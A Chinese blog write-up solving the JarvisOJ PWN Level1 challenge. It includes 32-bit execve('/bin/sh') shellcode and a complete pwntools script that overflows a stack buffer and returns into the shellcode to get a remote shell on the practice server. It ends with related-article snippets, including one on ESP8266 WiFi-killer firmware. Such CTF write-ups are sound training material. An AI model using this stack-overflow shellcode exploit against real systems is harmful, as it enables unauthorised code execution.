JarvisOJ-PWN-Level1

最新推荐文章于 2021-07-03 16:14:25 发布
最新推荐文章于 2021-07-03 16:14:25 发布
阅读量837 收藏 4
点赞数
分类专栏: Jarvis OJ writup (PWN)
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35495684/article/details/79580620
版权

JarvisOJ-PWN-Level

先checksec一下:
这里写图片描述
发现NX栈保护没有打开,也就是堆栈代码没有进行保护,那么就就题目很可能就是要输入shellcode在栈里执行吧。

打开IDA分析(32位):
主函数:
这里写图片描述
vulner..fuction()函数:
这里写图片描述
题目的逻辑是打出buf的首地址然后写入从标准输入100字节给buf。
然后输出Holle world。
我们再看buf的内存分配:
这里写图片描述
这里写图片描述
buf的内存长度就=0x00000004-(-0x00000088)=0x8c
0x100>0x8c,存在栈溢出。
然而我们这次没有system的地址了,栈溢出也没用,这时我们想起该程序没有NX保护,所以可以自己写shellcode,也就是将shellcode写入栈,在栈里执行system(“/bin/sh”),这就需要我们将ret的jmp变成buf的首地址,使得read结束后调用buf地址从而执行shellcode,而buf首地址也正好给了我们。
OK,开始写shellcode了,可以参考这个写shellcode。
可以用我的另一个赚们写shellcode的博客参考下:
http://blog.csdn.net/qq_35495684/article/details/79583232

所以我们获得了shellcode:

shellcode="\x31\xc0\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xb0\x0b\xcd\x80"

getshell代码:

# -*- coding: utf-8 -*-

from pwn import*
#context(log_level = 'debug', arch = 'i386', os = 'linux')

#shellcode=asm(shellcraft.sh())

r=remote('pwn2.jarvisoj.com', 9877)#连接
#r=process("./test")

shellcode="\x31\xc0\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xb0\x0b\xcd\x80"
addr=int(r.readline()[len("What's this:"):-2],16)
payload=shellcode+'a'*(0x8c-len(shellcode))+p32(addr)
r.sendline(payload)
r.interactive()

这里写图片描述

Jaken1223
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Jarvis OJ - pwn level3
hanqdi_的博客
02-03 223
前言 因为换了电脑,GitHub博客的环境搭起来太麻烦了,又想有所记录,所以又回到这里啦~ level3 前段时间做过pwn题目,现在再来做,发现以前很简单的脚本利用命令都忘记了,真是,啥东西都不能放,一放就忘,这脑子不管用了。 之后每天保持做题量,保持做题手感!在这里记录并且作为监督自己的一种方式。 做题思路 没有system和binsh,又给出了libc文件,容易想到可以用ret2libc方法...
pwn学习-jarvisoj-level5
qq_45653588的博客
12-22 363
mmap和mprotect练习,假设system和execve函数被禁用,请尝试使用mmap和mprotect完成本题。 mprotect()函数 在Linux中,mprotect()函数可以用来修改一段指定内存区域的保护属性。mprotect()函数把自start开始的、长度为len的内存区的保护属性修改为prot指定的值。 int mprotect(const void *start, size_t len, int prot); port:(读4,写2,执行1) 由于64位下函数传参前六个参.
Jarvis OJ pwn wp - level 0 ~ level 5
fa1c4的blog
07-03 295
level 0 溢出, ROP调用system("/bin/sh"), get shell from pwn import * from pwnlib.util.cyclic import cyclic sel = 1 filename = "./level0" URL, PORT = "pwn2.jarvisoj.com", 9881 io = process(filename) if sel == 0 else remote(URL, PORT) elf = ELF(filename) sy
jarvis oj---level1解题方法
weixin_45427676的博客
09-29 473
题目场景 nc pwn2.jarvisoj.com 9877 level1.80eacdcd51aca92af7749d96efad7fb5 解题 在vm终端“checksec"查看一下保护机制 没有什么保护,用IDA打开文件 查看vulnerable_function()函数 可以看到栈溢出 我们没有看到system()函数,没有找到"/bin/sh",但是在vulnerable_funct...
JarvisOJ-PWN-Level2
杀生丸?不,其实我要的是桔梗
03-22 658
JarvisOJ-PWN-Level2 IDA打开,稍微分析下发现其和level1大致一样,都是利用read栈溢出。 shift+12查看字符串 看到/bin/sh 双击得到地址: 再看到这个: 那么就是要传参数到system()里了。 所以构造代码如下: # -*- coding:utf-8 -*- from pwn import * # sh = proce...
[Jarvis OJ - PWN]——[XMAN]level2
Y_peak的博客
02-01 181
[Jarvis OJ - PWN]——[XMAN]level2 题目地址:https://www.jarvisoj.com/challenges 题目: 首先,checksec一下。32位并且没有开启PIE 在IDA中查看一下。main函数里面没有我们想要的,点开vulnerable_function函数。发现read函数,第一个参数为0,代表标准输入。可以利用栈溢出。 发现里面有system函数,但是里面的参数不是我们想要的,所以我们要覆盖一下它。按shift + F12,找到/bin/sh字符串
Jarvis OJ-PWN-[XMAN]level0 wp
分不清东西南北的Laffey
09-22 923
地址:nc pwn2.jarvisoj.com 9881 第一次做pwn的题目 先准备一下环境 1.pwntools sudo pip install pwntools 2.python sudo apt install python-pip 先打开虚拟机 把文件放进去用checksec看一下 发现是64位的 程序编译时关了栈不可执行保护 这说明我们可以在buf里面输入shellcode和填...
18.9.18 Jarvis OJ PWN----[XMAN]level2
qq_42192672的博客
09-18 211
先检测文件 我们可以看到没有栈保护,可以利用栈溢出 拖进IDA 先是一个vulnerable_function函数,同时在函数列表中我们可以看到有system函数,我们可以把returnaddress牵引到system函数上,执行/bin/sh语句 buf的偏移量是0x88个字节,花0x04个字节覆盖ebp,然后伪造returnsddress跳转到system,再加上用来给syst...
Jarvis oj-pwn level2-64
hanqdi_的博客
02-09 127
pwn level2-64 检查保护机制 放入ida分析 在ida 中发现有system函数,再查找下也有binsh字符串。 由于是64位的,所以,传参数时要注意,前6个参数是存在寄存器里的。 rdi的地址 利用pop ret 指令来传递参数,pop rdi,将参数binsh弹出栈,并存入rdi寄存器中,再ret返回栈中,再执行system函数,参数从rdi中取出。 构造脚本如下: ...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。... ...每个类别都包含多个挑战,每个挑战都有一个或多个标志(flag)。参赛者必须通过解决每个挑战来获取相应的标志,然后提交标志以获得...
基于NSGA-II的智能车辆换道轨迹规划与优化_查云飞.caj
最新发布
07-31
基于NSGA-II的智能车辆换道轨迹规划与优化_查云飞
chromedriver-mac-x64_122.0.6261.111.zip
07-31
chromedriver-mac-x64_122.0.6261.111.zip
chromedriver-mac-arm64_127.0.6485.0.zip
07-31
chromedriver-mac-arm64_127.0.6485.0.zip
Java本地接口开发手册.zip
07-31
Java本地接口开发手册
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值